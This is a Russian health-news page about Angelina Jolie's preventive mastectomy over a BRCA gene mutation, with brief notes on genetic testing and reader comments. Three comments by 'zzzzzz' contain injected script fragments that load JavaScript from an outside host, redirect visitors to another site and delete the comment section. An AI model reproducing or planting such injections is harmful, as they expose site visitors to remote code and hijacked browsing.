Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Анджелина Джоли удалила 2...  >>  Анджелина Джоли удалила 2 груди всего лишь из-за риска рака! А вы бы удалили?
 
Обратная связь
 

Анджелина Джоли удалила 2 груди всего лишь из-за риска рака! А вы бы удалили?

Размер шрифта
17 мая 2013 00:00
Юрий Малышев
Здоровье инфо
Анна Белевская
Здоровье инфо
  • google_analytics: false
  • Нравится

Американской актрисе Анджелине Джоли выполнили операцию в связи с высоким риском развития рака молочных желез.

анджелина джоли удалила 2 груди

«Решение далось мне очень нелегко, но я рада, что пошла на этот шаг. После операции риск развития рака молочных желез снизился с 87% до 5%. У меня шестеро детей, и я хочу сохранить здоровье надолго. Теперь я могу пообещать детям, что они не потеряют маму из-за рака молочных желез», – рассказывает Анджелина.

Высокий риск развития рака молочных желез у Анджелины Джоли обусловлен наличием мутации гена BRCA. На данный момент наиболее эффективным методом профилактики рака молочных желез при наличии мутации гена является двустороннее удаление молочных желез (мастэктомия), что позволяет снизить риск развития рака на 90%. Подобная мутация встречается только у 5% женщин, но при ее наличии рак молочных желез протекает более агрессивно. После мастэктомии форму молочных желез можно восстановить с помощью имплантов.

Несмотря на то, что мастэктомия является наиболее эффективным методом профилактики, многие женщины категорически отказываются от операции. В таком случае женщины, у которых есть мутация гена BRCA, должны ежегодно делать маммографию. Исследование на выявление мутации гена BRCA проводится по строгим показаниям, которые определяет врач. Для проведения исследования у пациентки берут кровь или мазок с внутренней поверхности щеки.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - Гость

26 мая 2013 в 10:46

Цитировать   |   Пожаловаться

Отважная и умная женщина-она думает в первую очередь о детях.Тем более что процент риска такой высокий.Я считаю что больше надо писать о том как беречь грудь с молоду и о том что пластика груди особенно молодым девочкам не нужна,хотя большей части силиконовых девочек-нуждается в операциях на мозге...

2 - Гость

14 июля 2013 в 11:35

Цитировать   |   Пожаловаться

По этой логике можно себе всё удалить, чтобы ничего никогда не болело...

3 - zzzzzz

30 июня 2015 в 19:19

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

4 - zzzzzz

30 июня 2015 в 19:33

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

5 - zzzzzz

30 июня 2015 в 23:17

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Носите лифчик на здоровье! Теперь не страшно!   Есть ли у вас ген Анджелины Джоли?   Что сахар делает с женской грудью!   Только в Парке Горького можно спокойно увидеть женскую грудь! И помочь в борьбе с раком груди!  
01 января 2013Скажи мне, где ты работаешь, и я скажу, будет ли у тебя рак груди 26 июня 2013Что пить, чтобы не было рака груди?
 
06 февраля 2013Технология разведения коров позволяет определить риск развития рака 18 октября 2012Новый тест скажет, будет у вас рак или нет
 

Слайдшоу

1
Мастопатия может коснуться каждой
Вся правда о раке груди
Как изменить будущее и не заболеть раком груди?

Тесты

1
Что вы знаете о раке груди?
Что вы знаете о груди?
Что вы знаете о раке груди?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.